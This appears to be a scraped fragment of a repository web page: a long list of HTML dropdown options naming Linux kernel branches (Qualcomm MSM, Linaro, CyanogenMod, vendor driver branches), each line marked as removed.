-<option value='caf/3.10/caf/msm-2.6.31.5'>caf/3.10/caf/msm-2.6.31.5</option>
-<option value='caf/3.10/caf/msm-2.6.35'>caf/3.10/caf/msm-2.6.35</option>
-<option value='caf/3.10/caf/msm-2.6.38'>caf/3.10/caf/msm-2.6.38</option>
-<option value='caf/3.10/caf/msm-3.0'>caf/3.10/caf/msm-3.0</option>
-<option value='caf/3.10/caf/msm-3.4'>caf/3.10/caf/msm-3.4</option>
-<option value='caf/3.10/caf/msm-3.7'>caf/3.10/caf/msm-3.7</option>
-<option value='caf/3.10/caf/q3.4/android-jb_2.5'>caf/3.10/caf/q3.4/android-jb_2.5</option>
-<option value='caf/3.10/caf/q3.4/android-msm-3.4'>caf/3.10/caf/q3.4/android-msm-3.4</option>
-<option value='caf/3.10/caf/q3.4/core-3.4'>caf/3.10/caf/q3.4/core-3.4</option>
-<option value='caf/3.10/caf/q3.4/jb_2.5'>caf/3.10/caf/q3.4/jb_2.5</option>
-<option value='caf/3.10/caf/q3.4/qandroid-3.4'>caf/3.10/caf/q3.4/qandroid-3.4</option>
-<option value='caf/3.10/caf/q3.9/android-msm-3.9-rc2'>caf/3.10/caf/q3.9/android-msm-3.9-rc2</option>
-<option value='caf/3.10/caf/redcloud'>caf/3.10/caf/redcloud</option>
-<option value='caf/3.10/caf/rhea'>caf/3.10/caf/rhea</option>
-<option value='caf/3.10/caf/rtsp-linux-github/master'>caf/3.10/caf/rtsp-linux-github/master</option>
-<option value='caf/3.10/caf/sensors-bmp180-driver/master'>caf/3.10/caf/sensors-bmp180-driver/master</option>
-<option value='caf/3.10/caf/sensors-mma8653-driver/master'>caf/3.10/caf/sensors-mma8653-driver/master</option>
-<option value='caf/3.10/caf/sensors-tsl277x-driver/master'>caf/3.10/caf/sensors-tsl277x-driver/master</option>
-<option value='caf/3.10/caf/stmems/master'>caf/3.10/caf/stmems/master</option>
-<option value='caf/3.10/caf/swift'>caf/3.10/caf/swift</option>
-<option value='caf/3.10/caf/swift_rb1.1'>caf/3.10/caf/swift_rb1.1</option>
-<option value='caf/3.10/caf/swift_rb1.2'>caf/3.10/caf/swift_rb1.2</option>
-<option value='caf/3.10/caf/swift_rb1.3'>caf/3.10/caf/swift_rb1.3</option>
-<option value='caf/3.10/caf/synaptics-touch/master'>caf/3.10/caf/synaptics-touch/master</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8909_ZTE'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8909_ZTE</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8909_ZTE_TXT'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8909_ZTE_TXT</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.1-CS'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.1-CS</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.1-Pre-CS'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.1-Pre-CS</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-CS'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-CS</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-FC'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-FC</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-Post-CS'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12-PL1.9-Post-CS</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-ES4'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-ES4</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-FC'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-FC</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-FC1'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/8x12bringup-MR2-FC1</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp_V2.0'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp_V2.0</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp_update'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Himax_ctp_update</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/QSIP_Sensor'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/QSIP_Sensor</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/QSIP_Sensor_update'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/QSIP_Sensor_update</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/STMicroelectronics_ctp_V4.1.0'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/STMicroelectronics_ctp_V4.1.0</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/STMicroelectronics_ctp_V4.1.0_update'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/STMicroelectronics_ctp_V4.1.0_update</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-CAPELLA-CM36283-MSM8X25EVBV21-hal'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-CAPELLA-CM36283-MSM8X25EVBV21-hal</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-CAPELLA-CM36283-MSM8X25EVBV21-kernel'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-CAPELLA-CM36283-MSM8X25EVBV21-kernel</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-SITRONIX-STK3310-MSM8X25EVBV21-hal'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-SITRONIX-STK3310-MSM8X25EVBV21-hal</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-SITRONIX-STK3310-MSM8X25EVBV21-kernel'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Sensor-SITRONIX-STK3310-MSM8X25EVBV21-kernel</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Synaptics_ctp_v2.7'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/Synaptics_ctp_v2.7</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/master'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/master</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/modify-flash-light'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/modify-flash-light</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/sensor_qsip_new'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/sensor_qsip_new</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/sensor_qsip_update'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/sensor_qsip_update</option>
-<option value='caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/test1'>caf/3.10/caf/thundersoft/ihvjointlab/sensor-driver/test1</option>
-<option value='caf/3.10/caf/tizen_0.1'>caf/3.10/caf/tizen_0.1</option>
-<option value='caf/3.10/caf/torvalds/block-dev'>caf/3.10/caf/torvalds/block-dev</option>
-<option value='caf/3.10/caf/torvalds/master'>caf/3.10/caf/torvalds/master</option>
-<option value='caf/3.10/caf/torvalds/next'>caf/3.10/caf/torvalds/next</option>
-<option value='caf/3.10/caf/trovalds/master'>caf/3.10/caf/trovalds/master</option>
-<option value='caf/3.10/caf/tsoft/8909_ZTE'>caf/3.10/caf/tsoft/8909_ZTE</option>
-<option value='caf/3.10/caf/tsoft/8909_ZTE_TXT'>caf/3.10/caf/tsoft/8909_ZTE_TXT</option>
-<option value='caf/3.10/caf/tsoft/QSIP_Sensor_update'>caf/3.10/caf/tsoft/QSIP_Sensor_update</option>
-<option value='caf/3.10/caf/tsoft/sensor_qsip_update'>caf/3.10/caf/tsoft/sensor_qsip_update</option>
-<option value='caf/3.10/caf/ub/master'>caf/3.10/caf/ub/master</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/devel'>caf/3.10/caf/ubifs/infradead.org/devel</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/df_new'>caf/3.10/caf/ubifs/infradead.org/df_new</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/experimental'>caf/3.10/caf/ubifs/infradead.org/experimental</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/for-linus-v3.20'>caf/3.10/caf/ubifs/infradead.org/for-linus-v3.20</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/linux-next'>caf/3.10/caf/ubifs/infradead.org/linux-next</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/linux-next-4.4'>caf/3.10/caf/ubifs/infradead.org/linux-next-4.4</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/master'>caf/3.10/caf/ubifs/infradead.org/master</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/new_truncate'>caf/3.10/caf/ubifs/infradead.org/new_truncate</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/qi'>caf/3.10/caf/ubifs/infradead.org/qi</option>
-<option value='caf/3.10/caf/ubifs/infradead.org/todo'>caf/3.10/caf/ubifs/infradead.org/todo</option>
-<option value='caf/3.10/caf/will/linux/aarch64/asids'>caf/3.10/caf/will/linux/aarch64/asids</option>
-<option value='caf/3.10/caf/will/linux/aarch64/devel'>caf/3.10/caf/will/linux/aarch64/devel</option>
-<option value='caf/3.10/caf/will/linux/atomics'>caf/3.10/caf/will/linux/atomics</option>
-<option value='caf/3.10/caf/will/linux/cacheflush'>caf/3.10/caf/will/linux/cacheflush</option>
-<option value='caf/3.10/caf/will/linux/checkers'>caf/3.10/caf/will/linux/checkers</option>
-<option value='caf/3.10/caf/will/linux/for-bjorn/pci-host-generic'>caf/3.10/caf/will/linux/for-bjorn/pci-host-generic</option>
-<option value='caf/3.10/caf/will/linux/for-joerg/arm-smmu/fixes'>caf/3.10/caf/will/linux/for-joerg/arm-smmu/fixes</option>
-<option value='caf/3.10/caf/will/linux/for-joerg/arm-smmu/pgsize'>caf/3.10/caf/will/linux/for-joerg/arm-smmu/pgsize</option>
-<option value='caf/3.10/caf/will/linux/for-joerg/arm-smmu/updates'>caf/3.10/caf/will/linux/for-joerg/arm-smmu/updates</option>
-<option value='caf/3.10/caf/will/linux/for-next/perf'>caf/3.10/caf/will/linux/for-next/perf</option>
-<option value='caf/3.10/caf/will/linux/for-rmk/hw-breakpoint'>caf/3.10/caf/will/linux/for-rmk/hw-breakpoint</option>
-<option value='caf/3.10/caf/will/linux/for-rmk/perf'>caf/3.10/caf/will/linux/for-rmk/perf</option>
-<option value='caf/3.10/caf/will/linux/io'>caf/3.10/caf/will/linux/io</option>
-<option value='caf/3.10/caf/will/linux/iommu/devel'>caf/3.10/caf/will/linux/iommu/devel</option>
-<option value='caf/3.10/caf/will/linux/iommu/dma'>caf/3.10/caf/will/linux/iommu/dma</option>
-<option value='caf/3.10/caf/will/linux/iommu/pci'>caf/3.10/caf/will/linux/iommu/pci</option>
-<option value='caf/3.10/caf/will/linux/iommu/pgsize'>caf/3.10/caf/will/linux/iommu/pgsize</option>
-<option value='caf/3.10/caf/will/linux/iommu/pgtbl'>caf/3.10/caf/will/linux/iommu/pgtbl</option>
-<option value='caf/3.10/caf/will/linux/iommu/smmuv3'>caf/3.10/caf/will/linux/iommu/smmuv3</option>
-<option value='caf/3.10/caf/will/linux/iommu/staging'>caf/3.10/caf/will/linux/iommu/staging</option>
-<option value='caf/3.10/caf/will/linux/iommu/vsmmu'>caf/3.10/caf/will/linux/iommu/vsmmu</option>
-<option value='caf/3.10/caf/will/linux/irq'>caf/3.10/caf/will/linux/irq</option>
-<option value='caf/3.10/caf/will/linux/locking'>caf/3.10/caf/will/linux/locking</option>
-<option value='caf/3.10/caf/will/linux/master'>caf/3.10/caf/will/linux/master</option>
-<option value='caf/3.10/caf/will/linux/misc-patches'>caf/3.10/caf/will/linux/misc-patches</option>
-<option value='caf/3.10/caf/will/linux/pci/bios32'>caf/3.10/caf/will/linux/pci/bios32</option>
-<option value='caf/3.10/caf/will/linux/perf/cci'>caf/3.10/caf/will/linux/perf/cci</option>
-<option value='caf/3.10/caf/will/linux/perf/core'>caf/3.10/caf/will/linux/perf/core</option>
-<option value='caf/3.10/caf/will/linux/perf/drivers'>caf/3.10/caf/will/linux/perf/drivers</option>
-<option value='caf/3.10/caf/will/linux/perf/fixes'>caf/3.10/caf/will/linux/perf/fixes</option>
-<option value='caf/3.10/caf/will/linux/perf/updates'>caf/3.10/caf/will/linux/perf/updates</option>
-<option value='caf/3.10/cmarinas/devel'>caf/3.10/cmarinas/devel</option>
-<option value='caf/3.10/cmarinas/ilp32'>caf/3.10/cmarinas/ilp32</option>
-<option value='caf/3.10/cmarinas/kmemleak'>caf/3.10/cmarinas/kmemleak</option>
-<option value='caf/3.10/cmarinas/master'>caf/3.10/cmarinas/master</option>
-<option value='caf/3.10/cmarinas/pgtable-4levels'>caf/3.10/cmarinas/pgtable-4levels</option>
-<option value='caf/3.10/cmarinas/soc-armv8-model'>caf/3.10/cmarinas/soc-armv8-model</option>
-<option value='caf/3.10/cmarinas/stable'>caf/3.10/cmarinas/stable</option>
-<option value='caf/3.10/cmarinas/upstream'>caf/3.10/cmarinas/upstream</option>
-<option value='caf/3.10/fsm3-3.10-4.0'>caf/3.10/fsm3-3.10-4.0</option>
-<option value='caf/3.10/fsm3-3.10-5'>caf/3.10/fsm3-3.10-5</option>
-<option value='caf/3.10/fsm3-3.10-6'>caf/3.10/fsm3-3.10-6</option>
-<option value='caf/3.10/fsm3-3.10-9900-rel5_ext'>caf/3.10/fsm3-3.10-9900-rel5_ext</option>
-<option value='caf/3.10/fsm4-9010-1.1.0'>caf/3.10/fsm4-9010-1.1.0</option>
-<option value='caf/3.10/github-borqsblr/borqs_b256_dvlp'>caf/3.10/github-borqsblr/borqs_b256_dvlp</option>
-<option value='caf/3.10/github-borqsblr/borqs_b256_rel'>caf/3.10/github-borqsblr/borqs_b256_rel</option>
-<option value='caf/3.10/github-borqsblr/borqs_feature_phone_dvlp'>caf/3.10/github-borqsblr/borqs_feature_phone_dvlp</option>
-<option value='caf/3.10/github-borqsblr/borqs_ftrphone_dvlp'>caf/3.10/github-borqsblr/borqs_ftrphone_dvlp</option>
-<option value='caf/3.10/github-borqsblr/master'>caf/3.10/github-borqsblr/master</option>
-<option value='caf/3.10/github-borqsindia/master'>caf/3.10/github-borqsindia/master</option>
-<option value='caf/3.10/github-boschsensortec/master'>caf/3.10/github-boschsensortec/master</option>
-<option value='caf/3.10/github-boschsensortec/old_master'>caf/3.10/github-boschsensortec/old_master</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1-rebase'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1-rebase</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1-staging'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1-staging</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1_3.0'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.1_3.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2-jb_2.6'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2-jb_2.6</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2_cafmerge'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2_cafmerge</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2_kgsl'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-10.2_kgsl</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-11.0'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-11.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-12.0'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-12.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-12.1'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-12.1</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-13.0'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-13.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-14.0'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-14.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cm-14.1'>caf/3.10/github-cm-android_kernel_samsung_d2/cm-14.1</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/cma-test'>caf/3.10/github-cm-android_kernel_samsung_d2/cma-test</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/ics'>caf/3.10/github-cm-android_kernel_samsung_d2/ics</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/jellybean'>caf/3.10/github-cm-android_kernel_samsung_d2/jellybean</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/jellybean-stable'>caf/3.10/github-cm-android_kernel_samsung_d2/jellybean-stable</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/kgsl-testing'>caf/3.10/github-cm-android_kernel_samsung_d2/kgsl-testing</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/next'>caf/3.10/github-cm-android_kernel_samsung_d2/next</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-11.0'>caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-11.0</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-11.0-XNG3C'>caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-11.0-XNG3C</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.0-YNG3C'>caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.0-YNG3C</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.0-YNG4N'>caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.0-YNG4N</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.1-YOG7D'>caf/3.10/github-cm-android_kernel_samsung_d2/stable/cm-12.1-YOG7D</option>
-<option value='caf/3.10/github-cm-android_kernel_samsung_d2/upstream-wip'>caf/3.10/github-cm-android_kernel_samsung_d2/upstream-wip</option>
-<option value='caf/3.10/github-dtsinc/master'>caf/3.10/github-dtsinc/master</option>
-<option value='caf/3.10/github-ite-touch/input'>caf/3.10/github-ite-touch/input</option>
-<option value='caf/3.10/github-ite-touch/master'>caf/3.10/github-ite-touch/master</option>
-<option value='caf/3.10/github-jdi/bu21150touch/master'>caf/3.10/github-jdi/bu21150touch/master</option>
-<option value='caf/3.10/github-max1187x/D1'>caf/3.10/github-max1187x/D1</option>
-<option value='caf/3.10/github-max1187x/D2'>caf/3.10/github-max1187x/D2</option>
-<option value='caf/3.10/github-max1187x/D3'>caf/3.10/github-max1187x/D3</option>
-<option value='caf/3.10/github-max1187x/E1'>caf/3.10/github-max1187x/E1</option>
-<option value='caf/3.10/github-max1187x/E2'>caf/3.10/github-max1187x/E2</option>
-<option value='caf/3.10/github-max1187x/master'>caf/3.10/github-max1187x/master</option>
-<option value='caf/3.10/github-maxim_1187x/D1'>caf/3.10/github-maxim_1187x/D1</option>
-<option value='caf/3.10/github-maxim_1187x/D2'>caf/3.10/github-maxim_1187x/D2</option>
-<option value='caf/3.10/github-maxim_1187x/D3'>caf/3.10/github-maxim_1187x/D3</option>
-<option value='caf/3.10/github-maxim_1187x/E1'>caf/3.10/github-maxim_1187x/E1</option>
-<option value='caf/3.10/github-maxim_1187x/E2'>caf/3.10/github-maxim_1187x/E2</option>
-<option value='caf/3.10/github-maxim_1187x/master'>caf/3.10/github-maxim_1187x/master</option>
-<option value='caf/3.10/github-maxim_sti/A1'>caf/3.10/github-maxim_sti/A1</option>
-<option value='caf/3.10/github-maxim_sti/A2'>caf/3.10/github-maxim_sti/A2</option>
-<option value='caf/3.10/github-maxim_sti/B1'>caf/3.10/github-maxim_sti/B1</option>
-<option value='caf/3.10/github-maxim_sti/B2'>caf/3.10/github-maxim_sti/B2</option>
-<option value='caf/3.10/github-maxim_sti/C1'>caf/3.10/github-maxim_sti/C1</option>
-<option value='caf/3.10/github-maxim_sti/C2'>caf/3.10/github-maxim_sti/C2</option>
-<option value='caf/3.10/github-maxim_sti/C3'>caf/3.10/github-maxim_sti/C3</option>
-<option value='caf/3.10/github-maxim_sti/C4'>caf/3.10/github-maxim_sti/C4</option>
-<option value='caf/3.10/github-maxim_sti/C5'>caf/3.10/github-maxim_sti/C5</option>
-<option value='caf/3.10/github-maxim_sti/D1'>caf/3.10/github-maxim_sti/D1</option>
-<option value='caf/3.10/github-maxim_sti/E1'>caf/3.10/github-maxim_sti/E1</option>
-<option value='caf/3.10/github-maxim_sti/E2'>caf/3.10/github-maxim_sti/E2</option>
-<option value='caf/3.10/github-maxim_sti/F1'>caf/3.10/github-maxim_sti/F1</option>
-<option value='caf/3.10/github-maxim_sti/master'>caf/3.10/github-maxim_sti/master</option>
-<option value='caf/3.10/github-maxtouch/for-upstream'>caf/3.10/github-maxtouch/for-upstream</option>
-<option value='caf/3.10/github-maxtouch/gen2-active-stylus'>caf/3.10/github-maxtouch/gen2-active-stylus</option>
-<option value='caf/3.10/github-maxtouch/maxtouch-v2.6.35'>caf/3.10/github-maxtouch/maxtouch-v2.6.35</option>
-<option value='caf/3.10/github-maxtouch/maxtouch-v2.6.39'>caf/3.10/github-maxtouch/maxtouch-v2.6.39</option>
-<option value='caf/3.10/github-maxtouch/maxtouch-v3.0'>caf/3.10/github-maxtouch/maxtouch-v3.0</option>
-<option value='caf/3.10/github-maxtouch/maxtouch-v3.10'>caf/3.10/github-maxtouch/maxtouch-v3.10</option>
-<option value='caf/3.10/github-maxtouch/maxtouch-v3.14'>caf/3.10/github-maxtouch/maxtouch-v3.14</option>
-<option value='caf/3.10/github-maxtouch/t107-active-stylus'>caf/3.10/github-maxtouch/t107-active-stylus</option>
-<option value='caf/3.10/github-polaris/kernel_polaris'>caf/3.10/github-polaris/kernel_polaris</option>
-<option value='caf/3.10/github-siliconimageinc/main'>caf/3.10/github-siliconimageinc/main</option>
-<option value='caf/3.10/github-sonymsm8x27/marshmallow'>caf/3.10/github-sonymsm8x27/marshmallow</option>
-<option value='caf/3.10/github-stflight/master'>caf/3.10/github-stflight/master</option>
-<option value='caf/3.10/github-stgasgauge/master'>caf/3.10/github-stgasgauge/master</option>
-<option value='caf/3.10/github-stmems/master'>caf/3.10/github-stmems/master</option>
-<option value='caf/3.10/github-stmems2/master'>caf/3.10/github-stmems2/master</option>
-<option value='caf/3.10/github-trustonic/Int250'>caf/3.10/github-trustonic/Int250</option>
-<option value='caf/3.10/github-trustonic/Int280'>caf/3.10/github-trustonic/Int280</option>
-<option value='caf/3.10/github-trustonic/MC12'>caf/3.10/github-trustonic/MC12</option>
-<option value='caf/3.10/github-trustonic/MC12+'>caf/3.10/github-trustonic/MC12+</option>
-<option value='caf/3.10/github-trustonic/androidMReady_301B'>caf/3.10/github-trustonic/androidMReady_301B</option>
-<option value='caf/3.10/github-trustonic/master'>caf/3.10/github-trustonic/master</option>
-<option value='caf/3.10/github-trustonic/reviewedSept03'>caf/3.10/github-trustonic/reviewedSept03</option>
-<option value='caf/3.10/github-trustonic/tbase-202'>caf/3.10/github-trustonic/tbase-202</option>
-<option value='caf/3.10/github-trustonic/tbase-300'>caf/3.10/github-trustonic/tbase-300</option>
-<option value='caf/3.10/github-trustonic/tbase-400'>caf/3.10/github-trustonic/tbase-400</option>
-<option value='caf/3.10/github-trustonic/trunk_8916_release'>caf/3.10/github-trustonic/trunk_8916_release</option>
-<option value='caf/3.10/jb_mr2_rb1.3'>caf/3.10/jb_mr2_rb1.3</option>
-<option value='caf/3.10/jb_mr2_rb1.7'>caf/3.10/jb_mr2_rb1.7</option>
-<option value='caf/3.10/jb_mr2_rb2.11'>caf/3.10/jb_mr2_rb2.11</option>
-<option value='caf/3.10/jb_mr2_rb2.2'>caf/3.10/jb_mr2_rb2.2</option>
-<option value='caf/3.10/kk_rb1.11'>caf/3.10/kk_rb1.11</option>
-<option value='caf/3.10/kk_rb1.25'>caf/3.10/kk_rb1.25</option>
-<option value='caf/3.10/kk_rb1.27'>caf/3.10/kk_rb1.27</option>
-<option value='caf/3.10/kk_rb1.28'>caf/3.10/kk_rb1.28</option>
-<option value='caf/3.10/kk_rb1.29'>caf/3.10/kk_rb1.29</option>
-<option value='caf/3.10/kk_rb1.3'>caf/3.10/kk_rb1.3</option>
-<option value='caf/3.10/kk_rb1.30'>caf/3.10/kk_rb1.30</option>
-<option value='caf/3.10/kk_rb1.31'>caf/3.10/kk_rb1.31</option>
-<option value='caf/3.10/kk_rb1.32'>caf/3.10/kk_rb1.32</option>
-<option value='caf/3.10/kk_rb1.33'>caf/3.10/kk_rb1.33</option>
-<option value='caf/3.10/kk_rb1.34'>caf/3.10/kk_rb1.34</option>
-<option value='caf/3.10/kk_rb1.4'>caf/3.10/kk_rb1.4</option>
-<option value='caf/3.10/kk_rb1.7'>caf/3.10/kk_rb1.7</option>
-<option value='caf/3.10/kk_rb1.8'>caf/3.10/kk_rb1.8</option>
-<option value='caf/3.10/kk_rb2.18'>caf/3.10/kk_rb2.18</option>
-<option value='caf/3.10/kk_rb2.23'>caf/3.10/kk_rb2.23</option>
-<option value='caf/3.10/kk_rb2.36'>caf/3.10/kk_rb2.36</option>
-<option value='caf/3.10/kk_rb2.41'>caf/3.10/kk_rb2.41</option>
-<option value='caf/3.10/kk_rb3.1'>caf/3.10/kk_rb3.1</option>
-<option value='caf/3.10/kk_rb3.2'>caf/3.10/kk_rb3.2</option>
-<option value='caf/3.10/kk_rb3.3'>caf/3.10/kk_rb3.3</option>
-<option value='caf/3.10/kk_rb5'>caf/3.10/kk_rb5</option>
-<option value='caf/3.10/l_LNX.LA.3.6'>caf/3.10/l_LNX.LA.3.6</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/arm64-v3.10'>caf/3.10/linaro/linux-linaro-stable/arm64-v3.10</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-android'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-android</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-android-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-android-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-rt'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-rt</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-rt-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-rt-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10-android'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10-android</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10-rt'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.10-rt</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-android'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-android</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-android-test'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-android-test</option>
-<option value='caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-rt'>caf/3.10/linaro/linux-linaro-stable/linux-linaro-lsk-v3.14-rt</option>
